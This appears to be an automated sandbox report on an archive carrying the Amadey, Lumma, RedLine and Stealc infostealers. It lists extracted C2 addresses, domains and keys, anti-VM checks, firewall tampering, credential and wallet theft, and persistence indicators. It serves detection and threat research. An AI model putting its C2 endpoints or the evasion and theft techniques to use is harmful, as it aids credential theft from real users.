amadey | d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4

Resubmissions

13/07/2024, 00:45

240713-a4kywayaqj 10

12/07/2024, 23:32

240712-3jb5fsvhmn 10

Analysis

max time kernel
453s
max time network
434s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
13/07/2024, 00:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

archive.zip
Size

14.0MB
MD5

aa3be7accc9a612ce95fcede2a64d791
SHA1

76bab53214bef8715658e47a01e14b9efc91cea9
SHA256

d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4
SHA512

dc232e6a0588161bd4b5decd3311a3ad1b5e58f723fa8ae7065ee3fa538fd432f4ef8bb857a3be372da97e62c49584041b94a4219ef8eae954491e963f09ecb4
SSDEEP

393216:WxovLlzWh46e8jm2KaxKhHK2VKaiKdWKn9KK:aov5246e8jjKaxKhHK2VKaiKdWKn9KK

Score

10^/10

amadey lumma redline stealc 4dd39d hate logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

stealc

Botnet

hate

http://85.28.47.30

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

lumma

https://answerrsdo.shop/api

https://bannngwko.shop/api

https://bargainnykwo.shop/api

https://affecthorsedpo.shop/api

https://radiationnopp.shop/api

https://publicitttyps.shop/api

https://benchillppwo.shop/api

https://reinforcedirectorywd.shop/api

https://contemplateodszsv.shop/api

https://applyzxcksdia.shop/api

https://replacedoxcjzp.shop/api

https://declaredczxi.shop/api

https://catchddkxozvp.shop/api

https://arriveoxpzxo.shop/api

https://bindceasdiwozx.shop/api

https://conformfucdioz.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Setup.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/988-248-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IIEHCFIDHI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
362	5344	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4924	powershell.exe
1500	powershell.exe
5180	powershell.EXE
2492	powershell.EXE
5156	powershell.exe
1252	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 15 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IIEHCFIDHI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IIEHCFIDHI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	LvCpfrq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	lUAENHe.exe

Executes dropped EXE 33 IoCs

pid	Process
4912	61aT9Z_GFEpsfKAXD3NOSsRp.exe
1104	QREJCGg2DQlVCP1YSKuyOEqB.exe
2540	XNCiw3N_dPHReLk3Jy6T4EUo.exe
4960	KjZVPZ2zzTxT190CWK4vStrg.exe
4512	kbi1uXnIGQFsMyg7ltTx27kq.exe
1180	Dod2yc932472MaLNFYX35QpJ.exe
684	fOam93AxbRSnB2uTOeOgHu8o.exe
408	EAjBxZtW_w9am5uGGTwXFIds.exe
1292	dBU5daKKnuglFey9yEfpQCyy.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
436	Y2YTSBAzM1gJXcAFXSXzOy7n.exe
4888	61aT9Z_GFEpsfKAXD3NOSsRp.tmp
3940	Install.exe
3728	goldenmusicalvariety32_64.exe
1532	Install.exe
4716	goldenmusicalvariety32_64.exe
2988	Install.exe
2956	Install.exe
4044	IIEHCFIDHI.exe
5020	explorti.exe
3388	6b3e4ff372.exe
3036	eqtpkqwqodik.exe
4472	b5ed612d79.exe
4924	JEBKKEGDBF.exe
3472	EGHCAKKEGC.exe
5732	explorti.exe
2180	Install.exe
1932	Install.exe
5612	LvCpfrq.exe
5424	lUAENHe.exe
2496	explorti.exe
5528	explorti.exe
3392	explorti.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	IIEHCFIDHI.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorti.exe

Loads dropped DLL 8 IoCs

pid	Process
4888	61aT9Z_GFEpsfKAXD3NOSsRp.tmp
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2568	MSBuild.exe
2568	MSBuild.exe
236	MSBuild.exe
236	MSBuild.exe
5344	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	LvCpfrq.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	LvCpfrq.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	lUAENHe.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
92	iplogger.org
93	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	api.myip.com
16	ipinfo.io
17	ipinfo.io
11	api.myip.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1516	powercfg.exe
4704	powercfg.exe
4032	powercfg.exe
4408	powercfg.exe
988	powercfg.exe
2064	powercfg.exe
4816	powercfg.exe
1512	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000800000001ace2-744.dat	autoit_exe

Drops file in System32 directory 42 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057	LvCpfrq.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437	LvCpfrq.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	lUAENHe.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE	LvCpfrq.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	lUAENHe.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	LvCpfrq.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057	LvCpfrq.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	LvCpfrq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	LvCpfrq.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
4044	IIEHCFIDHI.exe
5020	explorti.exe
3388	6b3e4ff372.exe
5732	explorti.exe
2496	explorti.exe
5528	explorti.exe
3392	explorti.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 684 set thread context of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 1180 set thread context of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1104 set thread context of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 4960 set thread context of 2568	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	103
PID 1292 set thread context of 3036	1292	dBU5daKKnuglFey9yEfpQCyy.exe	125
PID 3036 set thread context of 1180	3036	eqtpkqwqodik.exe	155
PID 3036 set thread context of 1836	3036	eqtpkqwqodik.exe	157
PID 4924 set thread context of 908	4924	JEBKKEGDBF.exe	165
PID 3472 set thread context of 2540	3472	EGHCAKKEGC.exe	167

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	lUAENHe.exe
File created	C:\Program Files (x86)\nXmjFVOHU\bjSCtNc.xml	lUAENHe.exe
File created	C:\Program Files (x86)\ANKVsfPAuVEU2\OmcPYYBhNQfCu.dll	lUAENHe.exe
File created	C:\Program Files (x86)\XYcGyWaqnbhU2\vIuMdLmMKRlFF.dll	LvCpfrq.exe
File created	C:\Program Files (x86)\qioMUrUoKCErC\NsJQlPN.dll	LvCpfrq.exe
File created	C:\Program Files (x86)\nXmjFVOHU\mPYhQC.dll	lUAENHe.exe
File created	C:\Program Files (x86)\ANKVsfPAuVEU2\fRIqltT.xml	lUAENHe.exe
File created	C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\YymlzAa.dll	lUAENHe.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	lUAENHe.exe
File created	C:\Program Files (x86)\utOkvPMviNUn\OXOwfwT.dll	lUAENHe.exe
File created	C:\Program Files (x86)\RmqlacUQU\IMLMRF.dll	LvCpfrq.exe
File created	C:\Program Files (x86)\IFfyxFxqzCUn\eLMiRsp.dll	LvCpfrq.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	LvCpfrq.exe
File created	C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\rmfhEWR.dll	LvCpfrq.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	lUAENHe.exe
File created	C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\XUmgQoB.xml	lUAENHe.exe
File created	C:\Program Files (x86)\tuyZfYaPCcjxC\yPCSuhq.xml	lUAENHe.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	LvCpfrq.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	LvCpfrq.exe
File created	C:\Program Files (x86)\RmqlacUQU\IWzpCVY.xml	LvCpfrq.exe
File created	C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\FVqkoxN.xml	LvCpfrq.exe
File created	C:\Program Files (x86)\qioMUrUoKCErC\BECAWIJ.xml	LvCpfrq.exe
File created	C:\Program Files (x86)\XYcGyWaqnbhU2\cgkxsgt.xml	LvCpfrq.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	LvCpfrq.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	LvCpfrq.exe
File created	C:\Program Files (x86)\tuyZfYaPCcjxC\JYXbMGc.dll	lUAENHe.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\ayCOowYLgjutNKI.job	schtasks.exe
File created	C:\Windows\Tasks\ZNzITvxeQRflwsDJD.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	IIEHCFIDHI.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\Tasks\beIeSqxTUIgkrqSZzo.job	schtasks.exe
File created	C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job	schtasks.exe
File created	C:\Windows\Tasks\LOHPKuWKJcOzSYPZu.job	schtasks.exe
File created	C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job	schtasks.exe
File created	C:\Windows\Tasks\JHXYugTugXnbcjp.job	schtasks.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2508	sc.exe
1908	sc.exe
3284	sc.exe
356	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4344	2180	WerFault.exe	182
5480	1932	WerFault.exe	181
5408	2988	WerFault.exe	107
1260	5612	WerFault.exe	254
4652	2956	WerFault.exe	108
3200	5424	WerFault.exe	348

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 24 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DOtbApzMYH7mk1KIsntEgO9f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DOtbApzMYH7mk1KIsntEgO9f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5208	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	LvCpfrq.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	LvCpfrq.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{39cd0eda-0000-0000-0000-d01200000000}	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	lUAENHe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
